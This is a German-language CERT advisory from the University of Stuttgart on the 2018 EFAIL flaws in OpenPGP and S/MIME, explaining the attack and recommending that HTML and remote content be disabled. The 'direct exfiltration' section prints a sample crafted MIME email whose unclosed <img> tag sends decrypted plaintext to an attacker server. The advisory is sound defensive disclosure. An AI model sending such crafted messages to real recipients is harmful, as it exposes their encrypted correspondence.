Stabsstelle Informationssicherheit der
Universität Stuttgart (RUS-CERT)
https://cert.uni-stuttgart.de
logo
Meldung Nr: RUS-CERT-1750

EFAIL - Schwachstelle bei GnuPG und S/MIME
(2018-05-14 21:08:22.619278+00)

Quelle: https://efail.de/

Forscher der Fachhochschule Münster, der Ruhr-Universität Bochum und der belgischen Universität Leuven haben Schwachstellen in OpenPGP und S/MIME entdeckt. Angreifer können aktive Inhalte von verschlüsselten E-Mails im HTML-Format, mit denen beispielsweise Bilder aus dem Internet nachgeladen werden können, ausnutzen, um an den Klartext der verschlüsselten Nachrichten zu gelangen. Administratoren und Benutzern, die OpenPGP oder S/MIME zur verschlüsselten Kommunikation verwenden, wird empfohlen, die Anzeige von HTML-Mails oder zumindest aktive Inhalte und das automatische Nachladen von Inhalten, wie bspw. Bilder aus dem Internet, in ihrem E-Mail-Programm zu deaktivieren.

Inhalt

Zusammenfassung

Beschreibung

Die EFAIL genannte Schwachstelle betrifft sowohl Mängel in den Standards OpenPGP und S/MIME als auch in deren Implementierungen in zahlreichen E-Mail-Clients, die HTML-Nachrichten darstellen können. Diese können sich Angreifer zunutze machen, um verschlüsselte Daten im Klartext zu erbeuten.

Der Angriff läuft vereinfacht wie folgt ab:

  1. Der Angreifer muss in den Besitz der verschlüsselten E-Mail-Nachricht gelangen, idealerweise bevor diese den Empfänger erreicht, zumindest aber bevor dieser sie entschlüsselt. Dies kann z.B. durch einen Mittelsmannangriff erfolgen, bei der die Nachricht auf dem Weg, z.B. auf einem vermittelnden Mailserver abgefangen und nach den gewünschten Aktionen weitergeleitet wird. Sofern die Nachricht verschlüsselt in einem Postfach liegt, auf das der Angreifer Zugriff hat, und diese vom Besitzer nur temporär zum Lesen entschlüsselt wird, kann er die Nachricht auch dort manipulieren.
  2. Die abgefangene, verschlüsselte Nachricht manipuliert der Angreifer, indem er
    • einen Rückkanal in den unverschlüsselten MIME-Teil der E-Mail einbaut (direct exfiltration, s.u.), oder
    • einen Rückkanal in den verschlüsselten Teil der E-Mail mit Hilfe eines CBC/CFB-Angriff injiziert (malleability gadgets, s.u.).
  3. Der Client des Empfängers entschlüsselt die E-Mail und der Klartext wird über den eingebauten Rückkanal dem Angreifer übermittelt.

a) Direkte Exfiltration
Die direkte Exfiltration macht sich Schwächen von E-Mail-Clients zunutze. Bei Clients, die verschiedene MIME-Teile einer Mail nicht voneinander isolieren, lässt sich der Ciphertext quasi in den Rückkanal einbetten, indem man es beispielsweise in <img> </img> Tags einschließt:

From: attacker@efailattack.com
To: victim@university.com
Content-Type: multipart/mixed;boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/html

<img src="http://efailattack.com/
--BOUNDARY
Content-Type: application/x-pkcs7-mime; smime-type="enveloped-data"
Content-Description: S/MIME Encrypted Message
Content-Transfer-Encoding: base64

7Na42pk1zagwggG5AgEAMIGgMIGUMQswCQYDVQQGEwJERTESMBAGA1UEBxMJU3R1dHR
HQYDVQQKExZVbml2ZXJzaXRhZXQgU3R1dHRnYXJ0MSgwJgYDVQQDEx9Vbml2ZXJzaXR
dHRnYXJ0IENBIC0gRzAxMSYwJAYJKoZIhvcNAQkBFhdjYS1nMDFAdW5pLXN0dXR0...

--BOUNDARY
Content-Type: text/html
">
--BOUNDARY--
so dass der Klartext dann Teil des HTML-Elements zum Nachladen des (vermeintlichen) Bildes wird:
<img src="http://efailattack.com/Mein-ganz-geheimer-Geheimtext">
Der Rückkanal entsteht in diesem Fall durch die Anzeige der entschlüsselten E-Mail im HTML-Format durch das Mailprogramm. Weil ihm durch die oben genannten <img>-Tags mitgeteilt wird, dass vermeintlich ein Bild dargestellt werden soll, schickt es einen HTTP-Request an den Server des Angreifers mit dem entschlüsselten Text als Bestandteil des URLs, um dieses nachzuladen. Der Server loggt jede Anfrage mit dem gesamten URL. So erhält der Angreifer den Klartext als Teil des Requests.

b) CBC/CFB-Angriff
Beim CBC/CFB-Angriff werden Schwächen in den Verschlüsselungsstandards und ihren Implementierungen ausgenutzt. Besonders problematisch ist die fehlende oder unzureichende Integritätsprüfung des Chiffrats vor der Entschlüsselung. So kann ein entsprechender Rückkanal in das Chiffrat eingebettet werden, ohne dass die Implementierung bei der Entschlüsselung einen Fehler meldet oder das Mailprogramm in entsprechend richtiger Weise auf eine entsprechende Fehlermeldung reagiert.

OpenPGP schneidet dank des Einsatzes von Modification Detection Codes (MDC) gegenüber S/MIME hier besser ab, insofern MDC nicht umgangen bzw. der E-Mail-Client auf Integritätsfehler richtig reagieren kann. Allgemein gestalten sich außerdem Angriffe auf OpenPGP-verschlüsselte Nachrichten wegen der eingesetzten Kompression komplexer.

Workaround

Als Sofortmaßnahme sollte die Exfiltration durch das Blockieren der Rückkanäle unterbunden werden.

Benutzern, die OpenPGP oder S/MIME zur verschlüsselten Kommunikation verwenden, wird dringend Folgendes empfohlen:

Gegenmaßnahmen

Es existieren derzeit keine Patches für die eingesetzte Software.

Um die Schwachstellen ursächlich zu beseitigen, müssen die Standards OpenPGP und S/MIME und deren Implementierungen verbessert werden. Das betrifft vor allem die korrekte Integritätsprüfung des Ciphertextes etwa mit authentifizierten Verschlüsselungsmodi für Blockchiffren, sprich Authenticated Encryption with Associated Data (AEAD); bei OpenPGP die Verbesserung von MDC.

Vulnerability ID

Weitere Information zu diesem Thema

Exploit Status

Revisionen dieser Meldung

(pu)

Hinweis
Die in diesem Text enthaltene Information wurde für die Mitglieder der Universität Stuttgart recherchiert und zusammengestellt. Die Universität Stuttgart übernimmt keinerlei Haftung für die Inhalte. Dieser Artikel darf ausschließlich in unveränderter Form und nur zusammen mit diesem Hinweis sowie dem folgenden Copyrightverweis veröffentlicht werden. Eine Veröffentlichung unter diesen Bedingungen an anderer Stelle ist ausdrücklich gestattet.

Copyright © 2022 RUS-CERT, Universität Stuttgart, https://cert.uni-stuttgart.de/


https://cert.uni-stuttgart.de/ticker/article.php?mid=1750